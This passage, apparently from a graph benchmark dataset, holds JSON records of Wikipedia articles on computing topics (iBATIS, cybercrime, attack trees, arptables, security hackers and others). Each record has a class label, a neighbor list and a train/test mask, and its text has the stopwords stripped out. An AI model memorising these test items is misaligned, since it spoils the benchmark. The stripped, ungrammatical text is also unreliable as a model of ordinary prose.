    "text": "Lauri_Karttunen:lauri karttunen lauri karttunen adjunct professor linguistics stanford acl fellow karttunen received ph.d. linguistics 1969 indiana university bloomington university texas austin 1970s worked mostly semantics published series seminal papers discourse referents presuppositions implicative verbs conventional implicatures questions 1980s karttunen became along ronald m. kaplan martin kay kimmo koskenniemi one pioneers computational linguistics application finite-state transducers phonology morphology karttunen kenneth r. beesley published textbook finite state morphology set applications creating morphological analyzers commercial versions finite-state technology developed karttunen colleagues parc xrce licensed xerox many companies including sap microsoft karttunen retired parc 2011 currently working language natural reasoning csli association computational linguistics acl gives year annual meeting lifetime achievement award age 66 karttunen became far youngest recipient award 45th meeting prague 2007 2009 indiana linguistics department gave karttunen distinguished alumni award 2011 acl created acl fellows program karttunen one seventeen selected founding group acl fellows whose contributions field extraordinary european meta-net organization awarded karttunen xfst xerox finite-state toolkit application meta-seal recognition 2012 meeting brussels software products services actively contribute european multilingual information society",
    "neighbors": [
      3668,
      2326,
      7724
    ],
    "mask": "None"
  },
  {
    "node_id": 4943,
    "label": 9,
    "text": "Nu_(programming_language):nu programming language nu interpreted object-oriented programming language lisp-like syntax created tim burks alternative scripting language program os x cocoa application programming interface api implementations also exist iphone linux language first announced c4 conference indie mac developers held august 2007 nu code defines simple complex numbers class example basic definition complex number defines instance variables method initialize object shows similarity code nu equivalent objective-c also shows similarity ruby sample nuke tool bundled nu also shows influence objective-c lisp ruby design language",
    "neighbors": [
      5409,
      9345,
      9732,
      6502,
      10470,
      7983,
      8303,
      499,
      11221,
      823,
      1852,
      9245
    ],
    "mask": "Test"
  },
  {
    "node_id": 4944,
    "label": 1,
    "text": "Apache_iBATIS:apache ibatis ibatis persistence framework automates mapping sql databases objects java .net ruby rails java objects pojos plain old java objects mappings decoupled application logic packaging sql statements xml configuration files result significant reduction amount code developer needs access relational database using lower level apis like jdbc odbc persistence frameworks hibernate allow creation object model java say user create maintain relational database automatically ibatis takes reverse approach developer starts sql database ibatis automates creation java objects approaches advantages ibatis good choice developer full control sql database schema example application may need access existing sql database used software access new database whose schema fully application developer control specialized database design team created schema carefully optimized high performance may 21 2010 development team forked code creating new project called mybatis making new releases consequence apache ibatis project became inactive moved apache attic june 2010 example assume database table java class read product record key new pojo following mapping added ibatis xml mapping file new java product object retrieved database product number 123 follows mapping file example codice_1 refers long integer value passed query parameter java object values properties object inserted query using similar codice_2 notation example parameter class codice_3 property called codice_4 codice_1 replaced codice_6 codice_7 object instance class codice_8 founder ibatis publicly stated dismay java 5 continued release new versions ibatis java versions 2.3.1 2.3.2 came april 2008 2.3.3 july framework currently available java .net ruby rbatis versions jbati project javascript orm inspired ibatis apache ibator tool closely related connects database uses metadata generate ibatis mapping files java classes 2001 project called ibatis started clinton begin originally focus development cryptographic software solutions first product released ibatis secrets personal data encryption signing tool much like pgp secrets written entirely java released open source license year microsoft published paper demonstrate recent .net 1.0 framework productive java purpose microsoft built version sun web pet store web project sun used show java best practices java blueprints microsoft claimed .net 10 times faster 4 times productive java 2002 clinton developed application called jpetstore demonstrate java could productive .net could also achieving better architecture used microsoft implementation jpetstore 1.0 big impact database layer clinton used attracted attention community soon ibatis database layer 1.0 project started composed two components ibatis dao ibatis sql maps ibatis 2.0 released june 2004 complete redesign keeping features clinton donated ibatis name code apache software foundation project stayed asf six years eventually ibatis dao deprecated considering better dao frameworks available spring framework may 19 2010 ibatis 3.0 published simultaneously development team decided continue development framework google code new project called mybatis june 16 2010 apache announced ibatis retired moved apache attic",
    "neighbors": [
      3080,
      9481,
      10377,
      8460,
      7567,
      1296,
      6161,
      1047,
      8217,
      11161,
      6555,
      8860,
      9245,
      3877,
      10661,
      11303,
      5677,
      10413,
      1327,
      7983,
      3763,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      6860,
      10573,
      10193,
      1363,
      8408,
      9179,
      7261,
      990,
      479,
      8799,
      865,
      10719,
      11235,
      8294,
      11111,
      8425,
      8810,
      747,
      5612,
      8825,
      2163,
      3573,
      6774,
      7159,
      1913,
      1018,
      9467,
      3710
    ],
    "mask": "Test"
  },
  {
    "node_id": 4945,
    "label": 4,
    "text": "Cybercrime:cybercrime cybercrime computer-oriented crime crime involves computer network computer may used commission crime may target cybercrimes defined offences committed individuals groups individuals criminal motive intentionally harm reputation victim cause physical mental harm loss victim directly indirectly using modern telecommunication networks internet networks including chat rooms emails notice boards groups mobile phones bluetooth/sms/mms cybercrime may threaten person nation security financial health issues surrounding types crimes become high-profile particularly surrounding hacking copyright infringement unwarranted mass-surveillance sextortion child pornography child grooming also problems privacy confidential information intercepted disclosed lawfully otherwise debarati halder k. jaishankar define cybercrime perspective gender defined 'cybercrime women crimes targeted women motive intentionally harm victim psychologically physically using modern telecommunication networks internet mobile phones internationally governmental non-state actors engage cybercrimes including espionage financial theft cross-border crimes cybercrimes crossing international borders involving actions least one nation-state sometimes referred cyberwarfare report sponsored mcafee published 2014 estimated annual damage global economy 445 billion approximately 1.5 billion lost 2012 online credit debit card fraud us 2018 study center strategic international studies csis partnership mcafee concludes close 600 billion nearly one percent global gdp lost cybercrime year computer crime encompasses broad range activities computer fraud dishonest misrepresentation fact intended let another refrain something causes loss context fraud result obtaining benefit forms fraud may facilitated using computer systems including bank fraud carding identity theft extortion theft classified information types crime often result loss private information monetary information government officials information technology security specialists documented significant increase internet problems server scans since early 2001 growing concern among government agencies federal bureau investigations fbi central intelligence agency cia intrusions part organized effort cyberterrorists foreign intelligence services groups map potential security holes critical systems cyberterrorist someone intimidates coerces government organization advance political social objectives launching computer-based attack computers networks information stored cyberterrorism general defined act terrorism committed use cyberspace computer resources parker 1983 simple propaganda piece internet bomb attacks holidays considered cyberterrorism also hacking activities directed towards individuals families organized groups within networks tending cause fear among people demonstrate power collecting information relevant ruining peoples lives robberies blackmailing etc cyberextortion occurs website e-mail server computer system subjected threatened repeated denial service attacks malicious hackers hackers demand money return promising stop attacks offer protection according federal bureau investigation cybercrime extortionists increasingly attacking corporate websites networks crippling ability operate demanding payments restore service 20 cases reported month fbi many go unreported order keep victim name public domain perpetrators typically use distributed denial-of-service attack however cyberextortion techniques exist doxing extortion bug poaching example cyberextortion attack sony pictures 2014 u.s. department defense dod notes cyberspace emerged national-level concern several recent events geostrategic significance among included attack estonia infrastructure 2007 allegedly russian hackers august 2008 russia allegedly conducted cyber attacks time coordinated synchronized kinetic non-kinetic campaign country georgia december 2015 ukraine power grid cyberattack also attributed russia considered first successful cyber attack power grid fearing attacks may become norm future warfare among nation-states concept cyberspace operations impacts adapted warfighting military commanders future crimes committed selected group criminals unlike crimes using computer tool crimes require technical knowledge perpetrators technology evolves nature crime crimes relatively new existence long computers have—which explains unprepared society world general towards combating crimes numerous crimes nature committed daily internet crimes primarily target computer networks devices include individual main target cybercrime computer considered tool rather target crimes generally involve less technical expertise human weaknesses generally exploited damage dealt largely psychological intangible making legal action variants difficult crimes existed centuries offline world scams theft likes existed even development high-tech equipment criminal simply given tool increases potential pool victims makes harder trace apprehend crimes use computer networks devices advance ends include unsolicited sending bulk email commercial purposes spam unlawful jurisdictions phishing mostly propagated via email phishing emails may contain links websites affected malware may contain links fake online banking websites used steal private account information content websites electronic communications may distasteful obscene offensive variety reasons instances communications may illegal extent communications unlawful varies greatly countries even within nations sensitive area courts become involved arbitrating groups strong beliefs one area internet pornography target strongest efforts curtailment child pornography illegal jurisdictions world whereas content may offensive non-specific way harassment directs obscenities derogatory comments specific individuals focusing example gender race religion nationality sexual orientation often occurs chat rooms newsgroups sending hate e-mail interested parties harassment internet also includes revenge porn instances committing crime using computer lead enhanced sentence example case united states v. neil scott kramer kramer served enhanced sentence according u.s sentencing guidelines manual §2g1.3 b 3 use cell phone persuade induce entice coerce facilitate travel minor engage prohibited sexual conduct kramer argued claim insufficient charge included persuading computer device cellular phone technically computer although kramer tried argue point u.s sentencing guidelines manual states term computer means electronic magnetic optical electrochemically high-speed data processing device performing logical arithmetic storage functions includes data storage facility communications facility directly related operating conjunction device connecticut u.s. state pass statute making criminal offense harass someone computer michigan arizona virginia south carolina also passed laws banning harassment electronic means harassment defined u.s. computer statutes typically distinct cyberbullying former usually relates person use computer computer network communicate obscene vulgar profane lewd lascivious indecent language make suggestion proposal obscene nature threaten illegal immoral act latter need involve anything sexual nature although freedom speech protected law democratic societies us done first amendment include types speech fact spoken written true threat speech/text criminalized intent harm intimidate also applies online type network related threats written text speech us supreme court definition true threat statements speaker means communicate serious expression intent commit act unlawful violence particular individual group darknet markets used buy sell recreational drugs online drug traffickers use encrypted messaging tools communicate drug mules dark web site silk road major online marketplace drugs shut law enforcement reopened new management shut law enforcement silk road 2.0 went silk road 3 reloaded emerged however older marketplace named diabolus market used name exposure brand previous success broad diffusion cybercriminal activities issue computer crimes detection prosecution according jean-loup richet associate professor sorbonne business school technical expertise accessibility longer act barriers entry cybercrime indeed hacking much less complex years ago hacking communities greatly diffused knowledge internet blogs communities hugely contributed information sharing beginners could benefit older hackers knowledge advice furthermore hacking cheaper ever cloud computing era order spam scam one needed dedicated server skills server management network configuration maintenance knowledge internet service provider standards etc comparison mail software-as-a-service scalable inexpensive bulk transactional e-mail-sending service marketing purposes could easily set spam jean-loup richet explains cloud computing could helpful cybercriminal way leverage attack – brute-forcing password improve reach botnet facilitating spamming campaign computer source evidence see digital forensics even computer directly used criminal purposes may contain records value criminal investigators form logfile countries internet service providers required law keep logfiles predetermined amount time example european wide data retention directive applicable eu member states states e-mail traffic retained minimum 12 months method cybercrime investigation many ways cybercrime take place investigations tend start ip address trace however necessarily factual basis upon detectives solve case different types high-tech crime may also include elements low-tech crime vice versa making cybercrime investigators indispensable part modern law enforcement method cybercrime detective work dynamic constantly improving whether closed police units international cooperation framework due easily exploitable laws cybercriminals use developing countries order evade detection prosecution law enforcement developing countries philippines laws cybercrime weak sometimes nonexistent weak laws allow cybercriminals strike international borders remain undetected even identified criminals avoid punished extradited country united states developed laws allow prosecution proves difficult cases agencies fbi used deception subterfuge catch criminals example two russian hackers evading fbi time fbi set fake computing company based seattle washington proceeded lure two russian men united states offering work company upon completion interview suspects arrested outside building clever tricks like sometimes necessary part catching cybercriminals weak legislation makes impossible otherwise then-president barack obama released executive order april 2015 combat cybercrime executive order allows united states freeze assets convicted cybercriminals block economic activity within united states first solid legislation combats cybercrime way european union adopted directive 2013/40/eu offences directive definitions procedural institutions also council europe convention cybercrime.. usa european union introducing new measures cybercrime 31 may 2017 china announced new cybersecurity law takes effect date penalties computer-related crimes new york state range fine short period jail time class misdemeanor unauthorized use computer computer tampering first degree class c felony carry 3 15 years prison however hackers hired information security experts private companies due inside knowledge computer crime phenomenon theoretically could create perverse incentives possible counter courts ban convicted hackers using internet computers even released prisonthough computers internet become central everyday life type punishment may viewed harsh draconian however nuanced approaches developed manage cyber offenders behavior without resorting total computer internet bans approaches involve restricting individuals specific devices subject computer monitoring computer searches probation parole officers technology advances people rely internet store sensitive information banking credit card information criminals increasingly attempt steal information cybercrime becoming threat people across world raising awareness information protected tactics criminals use steal information continues grow importance according fbi internet crime complaint center 2014 269,422 complaints filed claims combined reported total loss 800,492,073 cybercrime yet seem average person radar 1.5 million cyber-attacks annually means 4,000 attacks day 170 attacks every hour nearly three attacks every minute studies showing us 16 victims asked people carrying attacks stop anybody uses internet reason victim important aware one protected online cybercrime proliferated professional ecosystem evolved support individuals groups seeking profit cybercriminal activities ecosystem become quite specialized including malware developers botnet operators professional cybercrime groups groups specializing sale stolen content forth leading cybersecurity companies skills resources visibility follow activities individuals group wide variety information available sources used defensive purposes including technical indicators hashes infected files malicious ips/urls well strategic information profiling goals techniques campaigns profiled groups freely published consistent on-going access typically requires subscribing adversary intelligence subscription service level individual threat actor threat intelligence often referred actor ttp tactics techniques procedures infrastructure tools technical indicators often trivial attackers change corporate sectors considering crucial role artificial intelligence cybersecurity",
    "neighbors": [
      7553,
      3843,
      4356,
      5636,
      5764,
      7044,
      8202,
      11146,
      1169,
      4883,
      2324,
      1429,
      3092,
      7574,
      7827,
      9087,
      3354,
      9630,
      8735,
      5675,
      11437,
      8368,
      1970,
      1975,
      4023,
      11577,
      7228,
      11583,
      704,
      1088,
      4163,
      1861,
      6091,
      4813,
      9550,
      4689,
      2643,
      7929,
      9688,
      1625,
      7515,
      4956,
      3933,
      5085,
      4194,
      7522,
      4453,
      8805,
      1639,
      2409,
      4585,
      1899,
      6000,
      1781,
      5621,
      119,
      1529,
      1914,
      2812,
      5373,
      2558,
      3711
    ],
    "mask": "Test"
  },
  {
    "node_id": 4946,
    "label": 3,
    "text": "Pachicom:pachicom game pachinko hugely popular japan since involves playing pinball element slot machines mixed along gambling four different gameplay modes choose two assign player pachinko machine two allow players choose machine game based standard pachinko rules replicating experience playing pachinko parlor game board layout nails sticking metal balls would either fall holes created pegs order traverse board certain compartments added board metal ball find way one compartments player receive points similar credits slot machine players expect lose ball point falls bottom board similar falling bottomless pit action game initially player starts one hundred balls points mode clock goes forward 000000 seconds reaches 999999 seconds equivalent either 16666.65 non-real time minutes 2777.775 non-real time hours 115.740625 non-real time days occurs game remaining points stored top three score list mode b except clock goes backwards 999999 seconds way back 000000 seconds easy mash button repeatedly around direction pad right order accumulate mass winnings pachinko games cheat system hidden message famicom version found hex editor almost five percent entire rom 2.05 kilobytes 41 kilobyte rom image taken otherwise inaccessible message message written romaji features lengthy rant towards game executives harshly criticizing forcing changes fly particularly sound effects even showing replace initially intended sounds much shorter rant presumably written person also romaji accessed via hex editor included msx release",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Train"
  },
  {
    "node_id": 4947,
    "label": 3,
    "text": "Superstabilization:superstabilization superstabilization concept fault-tolerance distributed computing superstabilizing distributed algorithms combine features self-stabilizing algorithms dynamic algorithms superstabilizing algorithm – like self-stabilizing algorithm – started arbitrary state eventually converge legitimate state additionally superstabilizing algorithm recover rapidly single change network topology adding removing one edge node network self-stabilizing algorithm recovers change network topology – system configuration topology change treated like arbitrary starting configuration however self-stabilizing algorithm convergence single change network topology may slow convergence arbitrary starting state study superstabilizing algorithms special attention paid time takes recover single change network topology stabilization time superstabilizing algorithm defined exactly case self-stabilizing algorithm long takes converge legitimate state arbitrary configuration depending computational model time measured e.g. synchronous communication rounds asynchronous cycles superstabilization time time recover single topology change assumed system initially legitimate configuration network topology changed superstabilization time maximum time takes system reach legitimate configuration similarly adjustment measure maximum number nodes change state changes “ almost-legitimate configurations ” occurs one topology change formally modelled using passage predicates passage predicate predicate holds single change network topology also convergence legitimate configuration",
    "neighbors": [
      2012
    ],
    "mask": "None"
  },
  {
    "node_id": 4948,
    "label": 4,
    "text": "Attack_tree:attack tree attack trees conceptual diagrams showing asset target might attacked attack trees used variety applications field information technology used describe threats computer systems possible attacks realize threats however use restricted analysis conventional information systems widely used fields defense aerospace analysis threats tamper resistant electronics systems e.g. avionics military aircraft attack trees increasingly applied computer control systems especially relating electric power grid attack trees also used understand threats physical systems earliest descriptions attack trees found papers articles bruce schneier cto counterpane internet security schneier clearly involved development attack tree concepts instrumental publicizing however attributions early publicly available papers attack trees also suggest involvement national security agency initial development attack trees similar identical threat trees threat trees discussed 1994 edward amoroso attack trees multi-leveled diagrams consisting one root leaves children bottom child nodes conditions must satisfied make direct parent node true root satisfied attack complete node may satisfied direct child nodes node may child another node case becomes logical multiple steps must taken carry attack example consider classroom computers secured desks steal one securing cable must cut lock unlocked lock may unlocked picking obtaining key key may obtained threatening key holder bribing keyholder taking stored e.g mousemat thus four level attack tree drawn one path bribe keyholder obtain key unlock lock steal computer note also attack described node may require one many attacks described child nodes satisfied condition shows conditions however condition created example assuming electronic alarm must disabled cable cut rather making task child node cutting lock tasks simply reach summing junction thus path disable alarm cut cable steal computer created attack trees related established fault tree formalism fault tree methodology employs boolean expressions gate conditions parent nodes satisfied leaf nodes including priori probabilities node possible perform calculate probabilities higher nodes using bayes rule however reality accurate probability estimates either unavailable expensive gather respect computer security active participants i.e. attackers probability distribution events probably independent uniformly distributed hence naive bayesian analysis unsuitable since bayesian analytic techniques used fault tree analysis legitimately applied attack trees analysts instead use techniques determine attacks preferred particular attacker may involve comparing attacker capabilities time money skill equipment resource requirements specified attack attacks near beyond attacker ability perform less preferred attacks perceived cheap easy degree attack satisfies adversary objectives also affects attacker choices attacks within adversary capabilities satisfy goals likely attack trees become large complex especially dealing specific attacks full attack tree may contain hundreds thousands different paths leading completion attack even trees useful determining threats exist deal attack trees lend defining information assurance strategy important consider however implementing policy execute strategy changes attack tree example computer viruses may protected refusing system administrator access directly modify existing programs program folders instead requiring package manager used adds attack tree possibility design flaws exploits package manager one could observe effective way mitigate threat attack tree mitigate close root possible although theoretically sound usually possible simply mitigate threat without implications continued operation system example threat viruses infecting windows system may largely reduced using standard non-administrator account ntfs instead fat file system normal users unable modify operating system implementing negates way foreseen unforeseen normal user may come infect operating system virus however also requires users switch administrative account carry administrative tasks thus creating different set threats tree operational overhead also users still able infect files write permissions may include files documents systems using cooperative agents dynamically examine identify vulnerability chains creating attack trees built since 2000 several commercial packages open source products available adtool university luxembourg ent seamonster attacktree+ isograph secur ree amenaza technologies",
    "neighbors": [
      3552,
      9762,
      1315,
      483,
      612,
      5636,
      5067,
      7979,
      1453,
      6797,
      7887,
      8976,
      2193,
      3473,
      7739,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 4949,
    "label": 2,
    "text": "BrickOS:brickos brickos previously legos developed markus noga alternative operating system lego mindstorms rcx controller also provides c/c++ development environment rcx programs using gcc g++ gnu c c++ cross compilation tool chain necessary tools download programs rcx",
    "neighbors": [
      2179,
      2045,
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4950,
    "label": 7,
    "text": "Cloud_broker:cloud broker cloud broker entity manages use performance delivery cloud services negotiates relationships cloud providers cloud consumers cloud computing evolves integration cloud services may complex cloud consumers manage alone cases cloud consumer may request cloud services cloud broker instead contacting cloud provider directly according nist cloud computing reference architecture cloud brokers provides single point entry manage multiple cloud services business technical purposes two important unique features cloud broker ability provide single consistent interface multiple differing cloud providers clear visibility broker allows company providing services background general cloud brokers provide services three categories benefits using cloud broker business technical purpose include following pay needed cloud brokers provide selected assortment services required consumer despite benefits cloud broker provide also concerns related use cloud broker",
    "neighbors": [
      4194
    ],
    "mask": "Test"
  },
  {
    "node_id": 4951,
    "label": 2,
    "text": "Ubuntu_Software_Center:ubuntu software center ubuntu software center simply software center discontinued high-level graphical front end apt/dpkg package management system free software written python pygtk/pygobject based gtk+ program created adding managing repositories well ubuntu personal package archives ppa ubuntu ubuntu software center also allowed users purchase commercial applications development ended 2015 ubuntu 16.04 lts replaced gnome software early 2009 ubuntu developers noted package management within ubuntu could improved consolidated recent releases ubuntu ubuntu 9.04 jaunty jackalope included five applications package management consumed space resources well provide confusion users applications could downloaded using basic add/remove applications synaptic package manager software updater provided updating installed packages computer janitor cleaned packages longer needed software sources application allowed user selection package download location ubuntu developers set goal canonical introduced software center gradually starting ubuntu 9.10 karmic koala complete functionality expected ubuntu 11.10 october 2011 may 2011 plan mostly completed august 2015 chris hoffman pc world criticized application indicating canonical maintaining properly work replacement application pursued particular noted paid applications supported properly canonical informed developers application still works installing managing free software applications november 2015 canonical announced development would end application would replaced gnome software ubuntu 16.04 lts examples high-level graphical front end apt",
    "neighbors": [
      10760,
      7181,
      8213,
      6680,
      10270,
      5670,
      7722,
      9262,
      3131,
      3649,
      10817,
      3654,
      3152,
      1107,
      3667,
      6227,
      4192,
      9324,
      6257,
      1138,
      3189,
      5755,
      7293,
      10368,
      10900,
      3745,
      4775,
      6828,
      3245,
      5819,
      190,
      6361,
      8413,
      5343,
      741,
      231,
      7913,
      7920,
      9971,
      5369,
      8954,
      11525,
      2310,
      7947,
      9487,
      788,
      1813,
      8476,
      5410,
      9508,
      6445,
      6446,
      1842,
      2872,
      5962,
      3918,
      4951,
      2401,
      1379,
      5990,
      9063,
      8554,
      7020,
      10096,
      2930,
      1396,
      2955,
      2448,
      11669,
      3478,
      926,
      8112,
      439,
      6583,
      10172,
      10687,
      9671,
      5067,
      463,
      975,
      2010,
      3550,
      6625,
      7140,
      6119,
      5096,
      8177,
      1522,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 4952,
    "label": 7,
    "text": "Open_Garden:open garden open garden inc. american company based san francisco california develops free closed source mobile application called firechat enables peer-to-peer mobile internet connection sharing faster efficient data transmissions automatically actively choosing switching best available network without requiring users manually sift available networks find best one available open garden supports promotes open wireless networks member open wireless coalition founded electronic frontier foundation open garden inc. co-founded 2011 businessman micha benoliel systems architect taylor ongaro internet architect stanislav shalunov software developer greg hazel san francisco california united states company co-founders share similar backgrounds internet infrastructure peer-to-peer technology period 2004 2005 benoliel working skype well negotiating deals european telecommunication companies provided fundamentals skype skype ongaro spent much career ibm federal chief technology office meanwhile shalunov spent much career working internet infrastructure beginning internet2 us academic network consortium peer-to-peer filesharing service bittorrent met hazel lead developer popular bittorrent client utorrent used 200 million peer-to-peer users worldwide currently open garden popular united states followed india mexico france brazil united kingdom italy spain germany company already talking number mobile carriers countries cooperation currently working raising additional capital kevin restivo senior analyst international data corporation stated open garden likely popular among consumers emerging mobile markets africa relatively people cell phones incomes low people likely share phone service open garden previously offered software solution name proprietary internet community-based connection sharing software application shares internet access devices using wi-fi bluetooth users direct internet connection available within open garden network application automatically connects internet links devices laptops mobile phones person whose internet connection shared leaves network application automatically detects connects next best available connection introducing way access internet multiple channels one time improving speed reliability network self-healing self-forming nodes operates local knowledge together build network using probabilistic distributed algorithm open garden ’ solution built software rather hardware requires operational expenses minimal capital expenses mobile operators compared alternatives femtocells microcells raising 2 million seed money group leading technology industry angel investors open garden started developing incorporating roll multi-hop connectivity channel bonding application features company ’ roadmap since launched new funding team led allan green early investor phone.com mobileway david ulevitch ceo opendns derek parham creator google apps business digital garage also invested twitter path application free download open garden key people stated intend use freemium business model plan obtain revenues special enterprise-level services business customers sponsorships advertising also said aim freemium model extra features like vpn access business users application available android devices mac open garden product introduced october 11 2011 android open 2011 startup showcase award may 26 2012 open garden innovative startup award techcrunch disrupt conference 2012 toward end conference one judges venture capitalist fred wilson union square ventures said open garden favorite along stating company worthy conference name disrupt following year october 23 2013 open garden g-startup award global mobile innovator conference beginning mobile carriers afraid losing revenue might obtain mobile internet users one carrier requested google play block customers access open garden spokesman mark siegel stated open garden violates company policies enabling unauthorized tethering mobile connection sharing open garden founder ceo micha benoliel stated company anything illegal block remains force january 2014 circumvented sideloading apk made available open garden mobile website",
    "neighbors": [
      8640,
      3428,
      10021,
      5382,
      3207,
      9610,
      8413
    ],
    "mask": "None"
  },
  {
    "node_id": 4953,
    "label": 4,
    "text": "Arptables:arptables arptables computer software utility network administrator tool maintaining address resolution protocol arp packet filter rules linux kernel firewall modules tools may used create update view tables contain filtering rules similarly iptables program developed popular application creation filter configurations prevent arp spoofing linux kernel 2.4 offers two arp filtering chains input output linux kernel 2.6 adds third forward applied bridging packets",
    "neighbors": [
      1792,
      2049,
      4480,
      6797,
      1172,
      9496,
      3482,
      1436,
      4511,
      6431,
      5924,
      550,
      8998,
      10790,
      1708,
      3885,
      8753,
      823,
      569,
      5178,
      11577,
      5437,
      5057,
      1858,
      10433,
      11073,
      2118,
      4814,
      9423,
      10574,
      7121,
      10708,
      4568,
      9048,
      2907,
      6364,
      5860,
      3942,
      8943,
      8816,
      9971,
      10872,
      1273,
      6013,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 4954,
    "label": 6,
    "text": "Scality:scality scality global company based san francisco california develops software-defined object storage scality scale-out object storage software platform called ring company commercial product scality ring software deploys industry-standard x86 servers store objects files scality also offers number open source tools called zenko including zenko cloudserver compatible amazon s3 api scality founded 2009 jérôme lecat giorgio regni daniel binsfeld serge dugas brad king scality raised 7 million venture capital funding march 2011 c-round 22 million announced june 2013 led menlo ventures iris capital participation fsn pme existing investors including idinvest partners omnes capital galileo partners scality raised 45 million august 2015 series funding led menlo ventures participation existing investors one new strategic investor broadband tower 2016 hpe made strategic investment company april 2018 company announced 60 million round funding scality announced refreshed brand along global distribution agreement hp october 2014 scality added dell cisco global resellers 2015 scality principal product scale-out object storage software platform known ring scality ring delivers petabyte-scale software-defined storage designed use commodity hardware characterized cost-effective scaling performance auto-recovery scality ring multitier architecture scale thousands servers 100 petabytes single global namespace allows customers deploy performance-optimized capacity-optimized storage varied data durability levels small large object file support single global namespace object storage one fastest growing segments enterprise storage market according idc report “ worldwide file – object – based storage forecast 2016 – 2020 ” idc us41685816 september 2016 estimated object-based storage capacity expected grow cagr 30.7 percent 2016 2020 reaching 293.7eb 2020.the scality ring software turns standard x86 servers web-scale storage ring store amount data type incredible efficiency 100 availability guaranteed—all reducing costs much 90 legacy systems zenko scality open source multi-cloud data controller zenko integrates data managed on-premises services available public clouds zenko cloudserver formerly scality s3 server amazon web services simple storage service-compatible open source object storage server code written node.js single instance running docker container uses docker volumes persistent storage cloudserver uses code scality ring s3 interface includes apache 2.0 license note distributed system paid version s3 enterprise however level compatibility s3 interface scality ring zenko orbit cloud-based portal data placement workflows global metadata search product enables asynchronous replication clouds scality recognized consistently years object-based storage idc gartner first magic quadrant distributed file systems object storage scality ranked leader scality 2014 storage system software finalist storage magazine 2017 scality ranked leader gartner magic quadrant distributed file systems object storage",
    "neighbors": [
      11201,
      7364,
      3909,
      5384,
      1801,
      4011,
      7248,
      8404,
      1400,
      2395
    ],
    "mask": "Test"
  },
  {
    "node_id": 4955,
    "label": 9,
    "text": "Prototype_Verification_System:prototype verification system prototype verification system pvs specification language integrated support tools automated theorem prover developed computer science laboratory sri international menlo park california pvs based kernel consisting extension church theory types dependent types fundamentally classical typed higher-order logic base types include uninterpreted types may introduced user built-in types booleans integers reals ordinals type-constructors include functions sets tuples records enumerations abstract data types predicate subtypes dependent types used introduce constraints constrained types may incur proof obligations called type-correctness conditions tccs typechecking pvs specifications organized parameterized theories system implemented common lisp released gnu general public license gpl",
    "neighbors": [
      8450,
      5796,
      8262,
      2062,
      4791
    ],
    "mask": "None"
  },
  {
    "node_id": 4956,
    "label": 4,
    "text": "Security_hacker:security hacker security hacker someone explores methods breaching defenses exploiting weaknesses computer system network hackers may motivated multitude reasons profit protest information gathering challenge recreation evaluate system weaknesses assist formulating defenses potential hackers subculture evolved around hackers often referred computer underground longstanding controversy surrounds meaning term hacker controversy computer programmers reclaim term hacker arguing refers simply someone advanced understanding computers computer networks cracker appropriate term break computers whether computer criminals black hats computer security experts white hats 2014 article noted ... black-hat meaning still prevails among general public computer security hacker someone focuses security mechanisms computer network systems including endeavor strengthen mechanisms often used mass media popular culture refer seek access despite security measures media portrays 'hacker villain nevertheless parts subculture see aim correcting security problems use word positive sense white hat name given ethical computer hackers utilize hacking helpful way white hats becoming necessary part information security field operate code acknowledges breaking people computers bad discovering exploiting security mechanisms breaking computers still interesting activity done ethically legally accordingly term bears strong connotations favorable pejorative depending context subculture around hackers termed network hacker subculture hacker scene computer underground initially developed context phreaking 1960s microcomputer bbs scene 1980s implicated alt.2600 newsgroup 1980 article august issue psychology today commentary philip zimbardo used term hacker title hacker papers excerpt stanford bulletin board discussion addictive nature computer use 1982 film tron kevin flynn jeff bridges describes intentions break encom computer system saying 've little hacking clu software uses 1983 hacking sense breaking computer security already use computer jargon public awareness activities however release film wargames year featuring computer intrusion norad raised public belief computer security hackers especially teenagers could threat national security concern became real year gang teenage hackers milwaukee wisconsin known 414s broke computer systems throughout united states canada including los alamos national laboratory sloan-kettering cancer center security pacific bank case quickly grew media attention 17-year-old neal patrick emerged spokesman gang including cover story newsweek entitled beware hackers play patrick photograph cover newsweek article appears first use word hacker mainstream media pejorative sense pressured media coverage congressman dan glickman called investigation began work new laws computer hacking neal patrick testified u.s. house representatives september 26 1983 dangers computer hacking six bills concerning computer crime introduced house year result laws computer criminality white hat grey hat black hat hackers try distinguish depending legality activities moral conflicts expressed mentor hacker manifesto published 1986 phrack use term hacker meaning computer criminal also advanced title stalking wily hacker article clifford stoll may 1988 issue communications acm later year release robert tappan morris jr. so-called morris worm provoked popular media spread usage popularity stoll book cuckoo egg published one year later entrenched term public consciousness several subgroups computer underground different attitudes use different terms demarcate try exclude specific group agree eric s. raymond author new hacker dictionary advocates members computer underground called crackers yet people see hackers even try include views raymond see wider hacker culture view raymond harshly rejected instead hacker/cracker dichotomy emphasize spectrum different categories white hat grey hat black hat script kiddie contrast raymond usually reserve term cracker malicious activity according ralph d. clifford cracker cracking gain unauthorized access computer order commit another crime destroying information contained system subgroups may also defined legal status activities white hat hacker breaks security non-malicious reasons either test security system perform penetration tests vulnerability assessments client working security company makes security software term generally synonymous ethical hacker ec-council among others developed certifications courseware classes online training covering diverse arena ethical hacking black hat hacker hacker violates computer security little reason beyond maliciousness personal gain moore 2005 term coined richard stallman contrast maliciousness criminal hacker versus spirit playfulness exploration hacker culture ethos white hat hacker performs hacking duties identify places repair means legitimate employment black hat hackers form stereotypical illegal hacking groups often portrayed popular culture epitome public fears computer criminal grey hat hacker lies black hat white hat hacker grey hat hacker may surf internet hack computer system sole purpose notifying administrator system security defect example may offer correct defect fee grey hat hackers sometimes find defect system publish facts world instead group people even though grey hat hackers may necessarily perform hacking personal gain unauthorized access system considered illegal unethical social status among hackers elite used describe skilled newly discovered exploits circulate among hackers elite groups masters deception conferred kind credibility members script kiddie also known skid skiddie unskilled hacker breaks computer systems using automated tools written others usually black hat hackers hence term script i.e computer script automates hacking kiddie i.e kid child—an individual lacking knowledge experience immature usually little understanding underlying concept neophyte newbie noob someone new hacking phreaking almost knowledge experience workings technology hacking blue hat hacker someone outside computer security consulting firms used bug-test system prior launch looking exploits closed microsoft also uses term bluehat represent series security briefing events hacktivist hacker utilizes technology publicize social ideological religious political message hacktivism divided two 